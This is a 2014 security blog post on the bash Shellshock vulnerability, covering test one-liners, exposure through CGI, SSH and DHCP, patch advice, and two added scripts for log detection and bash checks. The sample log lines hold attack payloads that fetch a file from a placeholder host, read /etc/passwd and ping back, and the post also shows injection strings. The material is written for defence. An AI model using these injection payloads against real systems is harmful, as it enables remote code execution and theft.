Bash Vulnerability CVE-2014-6271 – Worm-able and Possibly Worse Than Heartbleed

Post Updated 9/30/2014

Several months ago, the Internet was thrown into a scramble when the Heartbleed vulnerability was disclosed. Web servers, devices, and essentially anything linked against a vulnerable OpenSSL were affected; as a result, attackers could read chunks of server memory, passwords and session data included, free of charge.

With Heartbleed, the exploit made a splash and many attackers started using the vulnerability. One of the higher-profile Heartbleed attacks was the CHS (Community Health Systems) breach, where the attackers siphoned 4.5 million patient records by attacking a Juniper device and then hopping onto the VPN behind it.

So how can something be bigger than Heartbleed? I’m glad you asked.

According to Red Hat's advisory on the bash code injection vulnerability, you can test whether your system is vulnerable by running the following:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If you see the word vulnerable printed before the test string, bash parsed the exported variable as a function definition and kept executing whatever followed the closing brace: you're vulnerable. I loaded up an OS X terminal without thinking, and was surprised by the result: OS X is vulnerable (Figure 1).

Figure 1 — OS X vulnerability

Throwing together a little Python command-line kung fu, I wanted to see how far I could take it and whether I could get Python code to execute with the following line (the base64 string decodes to "python code successful"; the print statement is Python 2 syntax):

env x='() { :;}; python -c "import base64; print base64.b64decode(\"cHl0aG9uIGNvZGUgc3VjY2Vzc2Z1bA==\")"' bash -c "echo this is a test"

Again… successful.

Figure 2 — Successful Python code execution

Better yet… why not a reverse netcat shell?

Figure 3 — Reverse netcat shell with established connection

So you don't have netcat installed on your system? Hats off to you. But did you remove wget or curl? If not, all an attacker needs to do is wget a file onto the box and execute it. Have Python, Perl or Ruby installed? There's a plethora of reverse shells out there. And the carnage doesn't stop there.

One researcher, Robert Graham of Errata Security, went so far as to scan the Internet to scope the scale of the problem, and has been keeping the world updated on the results. By placing the payload in HTTP headers that a CGI wrapper exports as environment variables (User-Agent, Referer, Cookie and the like), he got vulnerable hosts to send a ping back to his scanner, which gives a count of affected systems.

Figure 4 — Snippet of code from Errata Security
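What those mass scans look like from the receiving end, as an added example (my code, not Errata Security's or the original post's): a handful of constructed Apache combined-format log lines (the IP addresses and paths are made up), a grep that catches the function-definition prefix bash keys on regardless of how the scanner spaces it, and a sed that pulls out the command the attacker wanted run. It assumes a POSIX sh with grep -E and sed -E.

```shell
#!/bin/sh
# Added example, not from the original post: find Shellshock probes in a web
# server access log. Assumes POSIX sh, grep -E and sed -E.

# Constructed sample log in Apache combined format. The addresses, paths and
# payloads are made up; lines 1, 3 and 4 carry probes in the User-Agent or
# Referer field, line 2 is an ordinary browser request.
sample_log() {
cat <<'EOF'
203.0.113.7 - - [25/Sep/2014:10:03:41 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/ping -c 3 198.51.100.9"
198.51.100.20 - - [25/Sep/2014:10:04:02 +0000] "GET /index.html HTTP/1.1" 200 3021 "http://example.net/" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2014:10:05:17 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "() { :;}; /usr/bin/wget http://203.0.113.9/x -O /tmp/x" "-"
203.0.113.12 - - [25/Sep/2014:10:06:55 +0000] "GET /cgi-bin/hello.sh HTTP/1.1" 200 89 "-" "(){:;}; /bin/bash -c 'cat /etc/passwd'"
EOF
}

# Print every log line (from stdin) that carries the marker bash looks for:
# "()" followed by optional whitespace and "{". Scanners vary the spacing,
# so do not grep for the exact string from the advisory.
shellshock_hits() {
    grep -E '\(\)[[:space:]]*\{'
}

# Number of probe lines in a log read from stdin.
shellshock_count() {
    shellshock_hits | wc -l | tr -d ' '
}

# Distinct client addresses that sent probes (first field of each hit).
shellshock_sources() {
    shellshock_hits | cut -d' ' -f1 | sort -u
}

# The command each probe wanted bash to run: drop everything through the
# "};" that closes the empty function body, then the rest of the log line
# after the header field (a quote followed by a space) or the closing quote.
shellshock_payloads() {
    shellshock_hits | sed -E 's/.*\(\)[[:space:]]*\{[^}]*\};[[:space:]]*//; s/" .*$//; s/"$//'
}

# Usage: sample_log | shellshock_payloads   (or: shellshock_hits < access.log)
printf 'probes: %s\n' "$(sample_log | shellshock_count)"
sample_log | shellshock_payloads
```

Run it against a real log with `shellshock_hits < /var/log/apache2/access.log`; the payload list is the quickest way to tell a researcher's ping-back from someone pulling down an IRC bot.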

According to CSO Online, code execution through OpenSSH is possible, too, which gives an attacker yet another way onto a system. The caveat: sshd itself is not the bug. The exposure comes from ForceCommand (or a command= restriction in authorized_keys), because sshd exports the command the client asked for in the SSH_ORIGINAL_COMMAND environment variable and bash evaluates it. An attacker therefore needs a valid key that was supposed to be restricted to a single command, and Shellshock turns that restriction into an unrestricted shell.

The Register is reporting that some DHCP clients are vulnerable, too: on Linux the ISC dhclient hands options from the DHCP server to a shell script (dhclient-script) through environment variables, so a rogue DHCP server on the local network can push a crafted option and run commands as root on every client that requests a lease.

What else runs OpenSSH, acts as a DHCP client, and runs on *nix? You guessed it: home routers, modems, and other embedded devices. One caveat: only devices that actually ship bash are affected. Most consumer routers run BusyBox, whose ash shell does not import functions from the environment, so the real exposure is on the devices, NAS boxes and appliances that include a full bash. If an attacker uses those as jump points to scan internal subnets and get reverse shells back from there? It's not looking good.

With the number of Internet-facing devices vulnerable to this, it would be very easy for an attacker to turn it into a worm that bores past external gateways into homes. When was the last time you patched your TV? And with the current scans of the entire Internet going on, an attacker could just as easily push a destructive payload, a fork bomb say, hog CPU resources and crash systems around the globe. But how can you help fix this?

Prepare your system administration and operations staff with information about the severity of this bug. Even though many product and system vendors have yet to release a patch, an organization can still do the footwork needed to understand which systems will require a maintenance window. Have IT staff inventory and rank systems that hand attacker-controlled data to bash through the environment: web servers with CGI scripts (mod_cgi/mod_cgid, PHP-CGI, and anything that calls system() or popen() on a box where /bin/sh is bash), SSH servers that rely on ForceCommand, DHCP clients on untrusted networks, and embedded devices that ship bash. Prioritize the patch schedule by exposure, Internet-facing systems first.

As of the time of writing, the first patch is incomplete according to SANS (the follow-up is tracked as CVE-2014-7169), and patched systems are still vulnerable to a variant. To test whether your patched bash is still affected, run the following in an empty directory (use bash -c instead of sh -c on systems where /bin/sh is not bash, such as Debian and Ubuntu, where it is dash):

env X='() { (a)=>\' sh -c "echo date"; cat echo

On a fully fixed bash this prints the word date and cat complains that there is no file named echo. On an incompletely patched bash, the parser error lets the redirection consume the next word, so the output of the date command is written to a file named echo, which the cat then displays.
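To put both checks from this post (the CVE-2014-6271 one-liner near the top and the incomplete-fix test for CVE-2014-7169 just above) into a script you can drop on a fleet, here is an added example; it is my code, not Red Hat's, SANS's or the original post's. It assumes a POSIX sh, mktemp and a bash binary on PATH, and reports no-bash when there is none. It also shows the fix from the other side: how a repaired bash names exported functions so that a plain variable can never be taken for one again.

```shell
#!/bin/sh
# Added example, not from the original post: run the two Shellshock probes
# against the local bash and report one status word.
# Assumes: POSIX sh, mktemp, and a bash on PATH (reports "no-bash" otherwise).

# CVE-2014-6271. A vulnerable bash imports x as a function and keeps parsing
# after the closing brace, so "echo vulnerable" runs before the real command.
# Returns 0 (true) only if the word appears.
check_cve_2014_6271() {
    env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null \
        | grep -q 'vulnerable'
}

# CVE-2014-7169. After the first patch this definition still left the parser
# in a bad state: the ">" redirection swallowed the next word ("echo"), so
# "echo date" ran date and wrote its output into a file literally named
# "echo". Run it in a scratch directory and return 0 (true) if that file
# appears.
check_cve_2014_7169() {
    dir=$(mktemp -d) || return 1
    ( cd "$dir" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 ) || :
    if [ -f "$dir/echo" ]; then
        rm -rf "$dir"
        return 0
    fi
    rm -rf "$dir"
    return 1
}

# How a fixed bash exports functions: under names like BASH_FUNC_probe%%
# (some vendor builds use BASH_FUNC_probe()), so a plain variable whose value
# starts with "() {" is no longer mistaken for a function. Prints the
# variable name(s) bash used, or nothing on an unpatched bash.
exported_function_vars() {
    bash -c 'probe() { :; }; export -f probe; env' 2>/dev/null \
        | grep '^BASH_FUNC_probe' | cut -d= -f1
}

# One word: no-bash, vulnerable, or patched.
shellshock_status() {
    if ! command -v bash >/dev/null 2>&1; then
        echo no-bash
        return 0
    fi
    if check_cve_2014_6271 || check_cve_2014_7169; then
        echo vulnerable
    else
        echo patched
    fi
}

printf 'bash status: %s\n' "$(shellshock_status)"
printf 'exported function variable: %s\n' "$(exported_function_vars | head -n 1)"
```

Both probes spawn bash as a child with a crafted environment variable and nothing else, so the script is safe to run on production hosts; wire the status word into your inventory tool and re-run it after every bash package update, since the first round of vendor patches passed the 6271 check and failed the 7169 one.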

Updated September 30

In the past week, the bash bug has continued to evolve. Currently there are five or six different vulnerabilities around bash; read more details on those vulnerabilities here and here. Apple has released patches, available through Software Update, according to AppleInsider. It also looks like the bug has been in bash for about 20 years, compared with the roughly two years Heartbleed sat in OpenSSL. Shellshock is also in the wild, currently being exploited by many attackers for stealing password files, UDP flooding, and many flavors of IRC bots. While we haven't seen APT attacks using this technique, that doesn't mean they aren't using it or won't use it in the future. So stay vigilant and report anything that looks suspicious.
